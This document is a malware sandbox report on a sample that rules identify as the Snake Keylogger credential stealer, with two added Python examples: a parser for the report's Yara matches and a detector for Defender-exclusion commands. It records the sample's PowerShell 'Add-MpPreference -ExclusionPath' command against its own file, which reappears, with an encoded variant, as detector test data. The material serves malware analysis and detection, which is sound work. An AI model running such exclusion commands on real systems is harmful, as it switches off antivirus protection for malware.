Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFEB08 6_2_06DFEB08
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0B20 6_2_06DF0B20
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD0F8 6_2_06DFD0F8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFCCA0 6_2_06DFCCA0
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0040 6_2_06DF0040
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9C6D 6_2_06DF9C6D
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFFC68 6_2_06DFFC68
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF501F 6_2_06DF501F
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFF810 6_2_06DFF810
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF0007 6_2_06DF0007
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFF801 6_2_06DFF801
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFDDFF 6_2_06DFDDFF
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD999 6_2_06DFD999
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD9A8 6_2_06DFD9A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD550 6_2_06DFD550
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DF9543 6_2_06DF9543
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Code function: 6_2_06DFD540 6_2_06DFD540
Source: VbcXXnmIwPPhh.exe, 00000000.00000000.1255275199.0000000000F0A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1266065314.00000000015BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1283325923.0000000007D2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1282208749.0000000007730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3728527291.00000000073D9000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe Binary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
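The Yara evidence above is spread over unpacked PE dumps, raw memory dumps and process string spaces, and the same rule fires in the parent (process index 0) and in the re-launched child (process index 6, image base 0x400000). The following is an added example, not part of the sandbox report or of any sandbox tooling: a small parser that groups the "Matched rule" lines by rule and location and singles out hits that sit in private PAGE_EXECUTE_READWRITE memory, which is where an injected or hollowed payload normally lives. The sample lines are copied from the report with the rule metadata trimmed. The field layout assumed for the .sdmp names (process index, run, dump id, base address, page protection, an unknown field, memory type, an unknown field) is inferred from the names in this report and from the Win32 PAGE_* and MEM_* constants they carry; it is not a documented format.

```python
"""Pivot on Joe Sandbox 'Matched rule' lines: which rules fired, where, and
which hits are in RWX private memory.  Added example; .sdmp field layout is an
assumption inferred from the names in the report."""
import re
from collections import defaultdict

# Sample lines copied from the report above (rule metadata trimmed).
SAMPLE_LINES = [
    "Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows",
    "Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21",
    "Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen",
    "Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows",
    "Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows",
    "Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows",
]

LINE_RE = re.compile(r"^Source: (?P<source>.+?), type: (?P<type>\w+) Matched rule: (?P<rule>\S+)")
# Assumed layout: proc.run.id.base.protect.<?>.memtype.<?>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<run>[0-9a-f]{8})\.(?P<id>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<protect>[0-9a-f]{8})\.[0-9a-f]{8}\.(?P<memtype>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp$",
    re.IGNORECASE,
)
# Assumed layout: proc.run.<image>.<address>.<index>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<run>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)\.(?P<idx>\d+)(?P<raw>\.raw)?\.unpack$",
    re.IGNORECASE,
)
PID_RE = re.compile(r"PID: (?P<pid>\d+)")

# Win32 memory protection / type constants (low byte of protection only).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_memory_dump_name(name):
    """Decode a .sdmp file name into process index, base address, protection and type."""
    m = SDMP_RE.match(name)
    if not m:
        return None
    protect = int(m["protect"], 16)
    memtype = int(m["memtype"], 16)
    return {
        "process_index": int(m["proc"], 16),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "memtype": MEM_TYPE.get(memtype, hex(memtype)),
    }


def describe_source(source, kind):
    """Human-readable location for each of the three evidence source types."""
    if kind == "MEMORY":
        info = parse_memory_dump_name(source)
        if info:
            return f"proc#{info['process_index']} {info['base']:#x} {info['protect']} {info['memtype']}"
    elif kind == "UNPACKEDPE":
        m = UNPACK_RE.match(source)
        if m:
            raw = " (raw)" if m["raw"] else ""
            return f"proc#{int(m['proc'])} {m['image']} @ {int(m['base'], 16):#x}{raw}"
    elif kind == "MEMORYSTR":
        m = PID_RE.search(source)
        if m:
            return f"pid {m['pid']} strings"
    return source


def summarize(lines):
    """Map rule name -> list of locations it matched in."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            hits[m["rule"]].append(describe_source(m["source"], m["type"]))
    return dict(hits)


def rwx_private_hits(lines):
    """Rule hits inside RWX private memory: injected/hollowed code, not a mapped image."""
    out = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["type"] != "MEMORY":
            continue
        info = parse_memory_dump_name(m["source"])
        if info and info["protect"] == "PAGE_EXECUTE_READWRITE" and info["memtype"] == "MEM_PRIVATE":
            out.append((m["rule"], info))
    return out


if __name__ == "__main__":
    for rule, where in summarize(SAMPLE_LINES).items():
        print(rule)
        for w in where:
            print("   ", w)
    print("RWX private hits:", rwx_private_hits(SAMPLE_LINES))
```

Run against the full report text instead of SAMPLE_LINES to get the same pivot for every rule; the RWX-private filter is what separates the hollowed payload at 0x402000 in the child from the PAGE_READWRITE heap copy in the parent.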
Source: VbcXXnmIwPPhh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.SetAccessControl
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.AddAccessRule
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.SetAccessControl
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/9@4/4
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VbcXXnmIwPPhh.exe.log
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xqyadvx.hmn.ps1
Source: VbcXXnmIwPPhh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VbcXXnmIwPPhh.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
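The process tree above shows the sample spawning PowerShell to run Add-MpPreference -ExclusionPath against its own image before re-launching itself, so Defender stops scanning the file that the hollowed child is later written from. The following is an added example and not part of the sandbox report or of any vendor tooling: detection logic that runs over process-creation records, handles the -EncodedCommand variant by decoding the UTF-16LE payload, and marks the case where the excluded path is the parent process's own image. The event records are constructed to mimic Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the first one reproduces the command line from the report, the others are invented for contrast. All helper names are this example's own.

```python
"""Detect PowerShell Defender-exclusion commands in process-creation events,
including -EncodedCommand, and flag self-exclusion by the parent process.
Added example; events below are constructed, not real telemetry."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

MP_CMDLET = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION = re.compile(
    r"-Exclusion(Path|Process|Extension|IpAddress)\s+"
    r"(?:\"([^\"]+)\"|'([^']+)'|(\S+))",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by base64 (PowerShell accepts all)
ENCODED = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _norm(path: str) -> str:
    return path.strip("\"'").replace("/", "\\").lower()


def is_self_exclusion(kind: str, value: str, parent_image: str) -> bool:
    """True when the exclusion covers the parent process's own image (or its directory)."""
    v, p = _norm(value), _norm(parent_image)
    if kind.lower() == "process":
        return v == p or v == p.rsplit("\\", 1)[-1]
    if kind.lower() == "path":
        return v == p or p.startswith(v.rstrip("\\") + "\\")
    return False


@dataclass
class Finding:
    image: str
    parent_image: str
    command: str                       # decoded form if it was base64-encoded
    encoded: bool
    exclusions: List[Tuple[str, str]]  # [(kind, value), ...]
    self_exclusion: bool


def find_defender_exclusions(events) -> List[Finding]:
    """Scan process-creation records for Add-/Set-MpPreference exclusion changes."""
    findings = []
    for ev in events:
        raw = ev.get("CommandLine", "")
        decoded = decode_encoded_command(raw)
        command = decoded if decoded is not None else raw
        if not MP_CMDLET.search(command):
            continue
        exclusions = [(m.group(1), m.group(2) or m.group(3) or m.group(4))
                      for m in EXCLUSION.finditer(command)]
        if not exclusions:
            continue
        parent = ev.get("ParentImage", "")
        findings.append(Finding(
            image=ev.get("Image", ""),
            parent_image=parent,
            command=command,
            encoded=decoded is not None,
            exclusions=exclusions,
            self_exclusion=any(is_self_exclusion(k, v, parent) for k, v in exclusions),
        ))
    return findings


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; the first mirrors the command line in the report.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"',
        "ParentImage": r"C:\Users\user\Desktop\VbcXXnmIwPPhh.exe",
    },
    {   # invented: same cmdlet hidden behind -EncodedCommand, launched from cmd.exe
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -EncodedCommand "
        + _encode_ps(r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svc.exe'"),
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # invented benign: only reads preferences
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-MpPreference",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for f in find_defender_exclusions(SAMPLE_EVENTS):
        print(f"{f.parent_image} -> {f.image}: {f.exclusions} encoded={f.encoded} self={f.self_exclusion}")
```

A self-exclusion from a non-installer parent in a user-writable directory (Desktop, AppData, Temp) is a high-confidence alert on its own; the encoded variant is why the check decodes before matching rather than grepping the raw command line.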
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
